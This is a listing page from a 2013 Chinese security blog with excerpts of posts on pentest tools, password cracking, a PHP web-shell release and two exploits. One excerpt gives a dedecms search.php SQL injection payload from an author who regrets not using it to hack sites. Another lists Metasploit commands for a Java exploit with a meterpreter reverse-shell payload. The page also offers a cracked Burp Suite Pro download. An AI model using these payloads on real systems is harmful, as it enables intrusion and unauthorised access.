本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

PHP Vulnerability Hunter 1.3.87发布

2013.01.29 , , No Comments ,

最新版本的Php漏洞审计工具已经在4天前发布了。PHP Vulnerability Hunter是一款高级的自动化白盒Fuzz测试工具。最新版本是1.3.87.0,包括很多经过改进的特性像SQL注入漏洞扫描,基于静态分析的漏洞探测,改进的爬虫功能,任意文件上传扫面,集成测试,钩子检查,和一些对命令提示符的增强。这个工具能够在PHP应用中触发大量可被利用的报错。 &...

免费安全测试套件PenTBox

2013.01.29 , , No Comments ,

PenTBox是一款免费的安全套装,可以帮助技术人员对网络、系统的安全性和稳定性进行测试。PenTBox基于Ruby开发,面向GNU / Linux系统,且兼容Windows,MacOS和每一个操作系统。 特性: - 解码、密码破解工具 Base64 Encoder & Decoder Multi-Digest (MD5, SHA1, SHA256, SHA...

Web漏洞实战教程(DVWA的使用和漏洞分析)2013完整版

2013.01.25 , , No Comments ,

点击下载 转自:https://forum.90sec.org/thread-4902-1-1.html

天蝎座扫描器ScorpioScan 官方版

2013.01.24 , , No Comments ,

之前一片文章用到的工具 有各种求 答应大家的 就发布出来吧 免得大家去下载绑马的 先丢上MD5:3c0dbfd630ca3193d03665dfa9ee9524 自行校验下 介绍: 天蝎座扫描器 V3 是一款WEB程序安全检测工具,请经行有授权的安全检测或者程序开发自检。 加压密码:sniffer.pro 【杀软报毒】: 1.首先确定你的软件来自scan.sniffe...

[通杀]dedecms plus/search.php 注入漏洞利用方式

2013.01.19 , , No Comments ,

哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。 既然已经发出来了,我就把我自己搞的exp发下吧。。唉。 我一般是这样测试的: 提交 xx.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a 转...

[转载]一点密码破解的心得(更新字典)

2013.01.18 , , 1 Comment ,

其实主要是来科普下hashcat系列的,如果用过的就撸过吧。 Hashcat-plus是目前我见过的支持算法最多的GPU破解工具,支持Windows和Linux。另外带了Jumbo补丁的John貌似也不错,没怎么用过,不发表评论。 Hashcat系列有3个版本,这也是很多人一开始容易搞混的地方。三个版本分别是hashcat、 oclhashcat-lite和oclha...

burpsuite_pro_v1.5破解版

2013.01.18 , , No Comments ,

就不介绍跟截图了,大家都懂的.... 百度云盘下载

PHPSPY 2013 发布

2013.01.13 , , 2 Comments ,

PHPSPY 2013 功能改变可以看之前的预告: http://www.sablog.net/blog/phpspy2013_advance_notice/ 今天是本人的结婚周年纪念日,所以就发布了,当礼物送给我老婆,虽然我老婆什么都不懂。 PHPSPY 2013也是最终版,以后应该不会继续更新了。如有BUG,请在此留言,本人会及时修正。 最后预祝大家2013年,万...

[更新]新年初始,Java惊爆首个0day

2013.01.11 , , No Comments ,

use exploit/multi/browser/java_jre17_jmxbean set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit sysinfo getu...

[整理]34个windows平台渗透测试工具

2013.01.11 , , 1 Comment ,

大多数渗透测试人员喜欢使用MAC或者LINUX平台进行渗透测试工作,但是由于许多工具是windows平台的,所以大家可能会需要一个清单,方便把这些工具装在windows虚拟机上,于是就有了本文。 列表(点击工具名链接即可下载) HashCheck Shell Extension HashCheck Shell Extension可以很方便的计算和验证文件Hash。 &...